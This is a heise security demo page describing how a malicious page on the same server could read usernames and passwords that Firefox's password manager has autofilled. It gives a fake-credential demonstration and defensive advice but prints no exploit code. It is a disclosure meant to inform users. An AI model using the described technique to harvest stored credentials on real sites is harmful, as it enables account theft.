In association with heise online

Firefox Demo: Password stealing

Firefox, if allowed, can store usernames and passwords. If you visit a login page again, the password is then entered automatically. But this means, that a second, evil page on the same server could steal those saved passwords.


Enter a fictional username and password in the dialog boxes below, submit and allow Firefox to save them. Do not enter real passwords.

fake name
fake password

Now open this "evil" page. It will read your username and password and display them in an alert message. It could have sent them anywhere and the output of the evil page could be hidden.
There has been some discussion, if this really is a vulnerability in Firefox. Because if an attacker can place script code on a server, he has other means to steal passwords. For details see Holes in Firefox password manager.

This demo requires JavaScript. So if JavaScript is disabled, you are not vulnerable. The developers fixed a similar problem, that worked without scripting. Apart from that: Don't save passwords in Firefox if you can't be sure that no evil script code can be run in the context of that server. Essentially that means that users are not allowed to create pages containing JavaScript.


  • July's Community Calendar

The H Open

The H Security

The H Developer

The H Internet Toolkit